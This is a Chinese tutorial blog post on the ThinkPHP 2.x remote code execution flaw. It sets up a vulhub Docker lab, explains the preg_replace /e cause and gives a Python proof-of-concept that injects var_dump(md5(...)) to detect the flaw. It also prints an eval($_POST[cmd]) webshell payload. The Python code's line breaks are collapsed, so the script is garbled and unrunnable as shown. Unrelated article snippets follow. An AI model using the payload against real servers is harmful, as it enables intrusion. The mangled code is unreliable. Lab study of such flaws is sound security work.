Python武器库开发-武器库篇之ThinkPHP 2.x 任意代码执行漏洞(六十三)

Python武器库开发-武器库篇之ThinkPHP 2.x 任意代码执行漏洞(六十三)

PHP代码审计简介

PHP代码审计是指对PHP程序进行安全审计,以发现潜在的安全漏洞和风险。PHP是一种流行的服务器端脚本语言,广泛用于开发网站和Web应用程序。由于其开源性质和易于学习的特点,许多开发人员使用PHP来构建他们的网站和应用。

然而,不可否认的是,PHP应用程序也存在着安全风险。由于PHP的灵活性和易用性,开发人员可能会犯一些常见的安全错误,如注入攻击、跨站脚本攻击(XSS)、跨站请求伪造(CSRF)等。

PHP代码审计的目的是识别和修复这些安全漏洞,以确保应用程序的安全性。通过审计代码,可以发现潜在的漏洞,如未经验证的用户输入、不正确的权限控制、不安全的数据库查询等。

在进行PHP代码审计时,审计人员通常会使用一些工具和技术来辅助他们的工作。这包括静态代码分析工具、动态代码分析工具、漏洞扫描器等。此外,审计人员还需要具备一定的安全知识和编程经验,以便能够理解和分析代码中的潜在漏洞。

总之,PHP代码审计是一项重要的安全工作,可以帮助开发人员识别和修复潜在的安全漏洞,以保护应用程序和用户的数据安全。

漏洞环境搭建

这里我们使用Kali虚拟机安装docker并搭建vulhub靶场来进行ThinkPHP漏洞环境的安装

安装 docker

#更新软件
apt-get update
#安装CA证书
apt-get install -y apt-transport-https ca-certificates
#安装docker
apt install docker.io
#查看docker是否安装成功
docker -v
#启动docker
systemctl start docker
#显示docker信息
docker ps -a

在这里插入图片描述

在这里插入图片描述
如上图所示,我们已经成功安装好了docker

安装pip和docker-compose

#安装pip
apt-get install python3-pip
#安装docker-compose
apt install docker-compose
#查看版本,是否安装成功
docker-compose -v

在这里插入图片描述

在这里插入图片描述

如上图所示,我们已经成功安装好了pip和docker-compose

安装vnlhub

#安装vnlhub
git clone https://github.com/vulhub/vulhub.git

在这里插入图片描述

将docker换成国内源

#更改源
vim /etc/docker/daemon.json
#加入以下内容
{"registry-mirrors": ["https://dockerproxy.com","https://hub-mirror.c.163.com","https://mirror.baidubce.com","https://ccr.ccs.tencentyun.com"]
}#重启docker
systemctl restart docker
#查看信息,出现图中配置的信息即为成功
docker info

在这里插入图片描述

使用vulhub靶场

进入你想试验靶场的位置,cd vulhub/目录名,可以用ls查看漏洞靶场

在这里插入图片描述

比如我们想进入 ThinkPHP漏洞环境,可以 cd ThinkPHP,然后通过 ls 查看可以搭建的靶场,目前 vulhub关于 ThinkPHP漏洞 可以搭建的靶场有五个

在这里插入图片描述
我们拿 2-rce 漏洞举例,如果我们想要安装 2-rce 漏洞环境,可以 cd 到 2-rce ,然后输入以下命令启动靶场环境:

docker-compose up -d

输入以下的命令可以查看当前启动的靶场环境

docker-compose ps

若不需要使用该靶场的时候,可以输入以下的命令移除环境:

docker-compose down

最后我们输入http://localhost:8080 就能访问该靶场环境

在这里插入图片描述

ThinkPHP 2.x 任意代码执行漏洞原理

ThinkPHP是一个开源的PHP开发框架,该框架存在代码执行漏洞,漏洞产生的原因是因为ThinkPHP在处理URL参数时,没有对参数进行充分的过滤和验证,导致攻击者可以构造恶意的URL参数,从而执行任意代码。

具体原理如下:

  1. 攻击者构造恶意的URL参数,例如在GET请求的参数中添加PHP代码。

  2. ThinkPHP框架对URL参数进行处理时,会通过parseRequest方法解析URL,获取控制器和操作方法等信息。

  3. 在解析URL参数时,框架会使用eval函数将参数中的代码进行执行,从而实现代码执行的功能。

  4. 攻击者构造的恶意URL参数中的代码会被eval函数执行,从而导致任意代码执行漏洞的产生。

在ThinkPHP 2.x 版本里面 preg_relace的/e来匹配这个路由,导致用户输入参数被插入了双引号中,造成了任意代码执行。其POC如下所示:/?s=/Index/index/xxx/${@print(eval($_POST[cmd]))}

现在,我们构造如下的URLhttp://localhost:8080/?s=/Index/index/xxx/${var_dump(md5(123))},将会爆出如下的那么一串数字,这一步就是我们用python写检测ThinkPHP 2.x 任意代码执行漏洞的POC的关键。

在这里插入图片描述

这里爆出的数字是由MD5经过32位[小]加密的数字123

在这里插入图片描述

ThinkPHP 2.x 任意代码执行漏洞复现POC

接下来我们拥python写检测ThinkPHP 2.x 任意代码执行漏洞的POC,代码内容如下:

#!/usr/bin/env pythonimport requests
from urllib.parse import urljoin
from bs4 import BeautifulSoupdef thinkphp2_rce(url):payload = '?s=/index/index/xxx/${var_dump(md5(handsomewuyue))}'url = urljoin(url, payload)response = requests.get(url=url)
# 这里的31664625b85cc0cf91406a4e028ede29是由handsomewuyue字符经过32位[小]MD5加密得到的数字,用户可根据自己在实际过程中构造的POC进行自定义更改if '31664625b85cc0cf91406a4e028ede29' in response.text:print("漏洞存在")else:print("漏洞不存在")   if __name__ == '__main__':url = 'http://localhost:8080/'thinkphp2_rce(url)

注意:判断漏洞是否存在的MD5加密数据是根据我们所构造的POC中所发送的字符绝定的,这里的31664625b85cc0cf91406a4e028ede29是由我们所构造的payload'?s=/index/index/xxx/${var_dump(md5(handsomewuyue))}'中的handsomewuyue字符经过32位[小]MD5加密得到的数字,用户可根据自己在实际过程中构造的POC进行自定义更改

在这里插入图片描述

POC代码详细分析

这段代码是一个用于检测ThinkPHP 2.x版本存在远程命令执行(Remote Code Execution)漏洞的脚本。下面是代码的分析:

  1. 导入所需的库:
  • requests: 用于向服务器发送HTTP请求和接收响应。

  • urljoin: 用于将相对URL转换为绝对URL。

  • BeautifulSoup: 用于解析HTML响应。

    1. 定义一个名为thinkphp2_rce的函数,该函数接收一个url参数。
  1. 在函数内部,定义一个payload字符串,其中包含一个特定的URL路径(?s=/index/index/xxx/${var_dump(md5(handsome xuanyue))})。这个payload是用来构造恶意请求的。

  2. 使用urljoin函数将payload与传入的URL拼接在一起,得到最终的URL。

  3. 使用requests库发送GET请求,将最终的URL作为请求目标。

  4. 如果响应文本中包含特定的MD5哈希值(31664625b85cc0cf91406a4e028ede29),则打印"漏洞存在";否则,打印"漏洞不存在"。

if __name__ == '__main__':部分,定义了一个默认的URL变量(url = 'http://localhost:8080/'),然后调用thinkphp2_rce函数,并传递这个URL作为参数。这是为了在直接运行脚本时进行测试,可以根据实际情况修改URL。

运行效果图

如下是我们这串代码的实际运行效果图:

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/32119.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

探索Linux的奇妙世界:第二关---Linux的基本指令1

1. xshell与服务器的连接 想必大家在看过上一期视频时已经搭建好了Linux的环境了并且已经下好了终端---xshell了吧?让我来带大家看一看下好了是什么样子的: 第一次登陆会让你连接你的服务器,就是我们买的云服务器,买完之后需要把公网地址ip复制过来进行链接,需要用户名和密码连…

React hydrateRoot如何实现

React 服务器渲染中,hydrateRoot 是核心,它将服务器段的渲染与客户端的交互绑定在一起,我们知道 React 中 Fiber Tree 是渲染的的核心,那么 React 是怎么实现 hydrateRoot 的呢?首先我们验证一下,hydrateRo…

Mysql 官方提供的公共测试数据集 Example Databases

数据集:GitHub - datacharmer/test_db: A sample MySQL database with an integrated test suite, used to test your applications and database servers 下载 test_db: https://github.com/datacharmer/test_db/releases/download/v1.0.7/test_db-1.0.7.tar.gz …

aspose-words去水印自用资源

官方文档https://docs.aspose.com/words/java/convert-a-document-to-pdf/ 声明&#xff1a;限个人学习使用&#xff0c;商用后果与本人无关。 1.引入依赖 <dependencies><dependency><groupId>com.aspose</groupId><artifactId>aspose-words&…

鼠标滚轮上下滑动忽上忽下怎么办? 鼠标滚轮乱跳的办法

方法一&#xff1a;看看鼠标底盘有没有污渍&#xff0c;把污渍清理一下 方法二&#xff1a;进入电脑的设置&#xff0c;然后搜索鼠标&#xff0c;在鼠标设置中将鼠标的灵敏度调低一些 我的先用方法一&#xff0c;再用方法二就成功解决了。 参考链接如下&#xff1a; 鼠标滚轮…

获取当前时间月份的首日与最后一天

获取当前时间月份的首日与最后一天 import calendardef get_month_start_and_end(date=datetime.datetime.now()):"""获取当前时间的月份首日与最后一天:param date::return: (首日,最后一天)"""year, month = str(date).

探索CSS3多媒体查询:响应式设计的魔法钥匙

在网页设计的广阔天地里&#xff0c;CSS3多媒体查询&#xff08;Media Queries&#xff09;无疑是响应式设计的魔法钥匙&#xff0c;它赋予了网页根据不同设备特征和屏幕尺寸自动调整样式的能力。本文将深入浅出地介绍CSS3多媒体查询的原理、语法、实战应用&#xff0c;并通过生…

面试问题-除了threading还会哪种并发

threading实现多线程并发 multiprocessing实现多进程并发 asyncio实现基于协程的异步IO&#xff08;asyncio&#xff09; threading 和 multiprocessing &#xff0c;多进程和多线程并发的几个关键区别&#xff1a; 全局解释器锁&#xff08;GIL&#xff09;&#xff1a; t…

Python基础教程(三十):math模块

&#x1f49d;&#x1f49d;&#x1f49d;首先&#xff0c;欢迎各位来到我的博客&#xff0c;很高兴能够在这里和您见面&#xff01;希望您在这里不仅可以有所收获&#xff0c;同时也能感受到一份轻松欢乐的氛围&#xff0c;祝你生活愉快&#xff01; &#x1f49d;&#x1f49…

使用Python进行机器学习:从基础到实战

使用Python进行机器学习:从基础到实战 机器学习是人工智能的一个重要分支,近年来得到了广泛的应用。Python作为一种高效、易用的编程语言,已经成为机器学习领域的首选工具。本文将介绍Python在机器学习中的应用,涵盖基础知识、常用库以及一个完整的实战项目,帮助读者从基…

Cadence:Conformal系列形式验证工具

Conformal 工具最早由Verplex Systems开发。Verplex是一家专注于形式验证工具开发的公司&#xff0c;其核心产品是Conformal等效性检查工具。由于其技术的先进性和市场需求&#xff0c;Verplex的 Conformal工具迅速在半导体行业内获得了认可。 2003 年&#xff0c;Cadence Desi…

JS数据类型解读

在JavaScript&#xff08;JS&#xff09;中&#xff0c;数据类型可以分为两大类&#xff1a;原始类型&#xff08;Primitive Types&#xff09;和引用类型&#xff08;Reference Types&#xff09;。以下是对每种数据类型的详细讲解&#xff1a; 一、原始类型&#xff08;Prim…

基于vue3 + ant-design 使用阿里图标库iconfont.cn

对于使用 iconfont.cn 的用户&#xff0c;通过设置 createFromIconfontCN 方法参数对象中的 scriptUrl 字段&#xff0c; 即可轻松地使用已有项目中的图标。 组件封装 IconFont <template><IconFont :type"iconType" /> </template><script se…

Web应用和Tomcat的集成鉴权1-BasicAuthentication

作者:私语茶馆 1.Web应用与Tomcat的集成式鉴权 Web应用部署在Tomcat时,一般有三层鉴权: (1)操作系统鉴权 (2)Tomcat容器层鉴权 (3)应用层鉴权 操作系统层鉴权包括但不限于:Tomcat可以和Windows的域鉴权集成,这个适合企业级的统一管理。也可以在Tomcat和应用层独立…

[jetson][python]jetson上使用的onnxruntime-gpu所有whl文件下载地址汇总

适用JetPack 4.4 / 4.4.1 / 4.5 / 4.5.1 / 4.6 / 4.6.1平台系统自带python3.6版本&#xff0c;注意需要刷机时候把cuda刷进去&#xff0c;不要随便升级系统自带python3版本 序号版本名称下载地址1onnxruntime-gpu-1.4.0-cp36-cp36m-linux-aarch64.whl点我下载2onnxruntime-gpu…

怎样利用 Clojure 的宏来创建自定义的控制结构,并且如何避免常见的错误?

在 Clojure 中&#xff0c;宏是一种宏展开的机制&#xff0c;它可以用于创建自定义的控制结构。通过使用宏&#xff0c;你可以在编写代码时引入新的语法&#xff0c;从而使代码更具可读性和表达力。 要创建一个宏&#xff0c;你需要使用defmacro宏&#xff0c;并将宏名称与一个…

湖南(市场调研)源点咨询 新产品上市前市场机会调研与研究分析

湖南源点调研认为&#xff1a;无论是创业公司&#xff0c;还是在公司内部探索新的项目或者新的产品线等&#xff0c;首先都要做“市场机会分析与调研“&#xff0c;要真正思考并解答以下疑问&#xff1a; 我们的目标客户群体是谁&#xff0c;他们如何决策&#xff1f; 我们所…

windows下mysql修改 my.ini的datadir后 `Access denied`

1. 背景 window安装mysql数据库时&#xff0c;不能指定数据文件存放位置&#xff08;默认安装路径 "C:/ProgramData"&#xff09;。 只能通过修改mysql.ini来更改数据文件存放目录。 2. 问题&#xff1a; 修改mysql.ini后&#xff0c;mysql 出现 "Access den…

Python爬虫学习 | Scrapy框架详解

一.Scrapy框架简介 何为框架&#xff0c;就相当于一个封装了很多功能的结构体&#xff0c;它帮我们把主要的结构给搭建好了&#xff0c;我们只需往骨架里添加内容就行。scrapy框架是一个为了爬取网站数据&#xff0c;提取数据的框架&#xff0c;我们熟知爬虫总共有四大部分&am…

Promise的异步调用

Promise调用两个接口&#xff0c;第二个接口的入参为第一个接口的返回值 Promise的异步调用 应用场景实例 应用场景 Promise调用两个接口&#xff0c;第二个接口的入参为第一个接口的返回值 实例 1.两个接口的调用&#xff0c;正常的写法 // 登录接口 function login(user…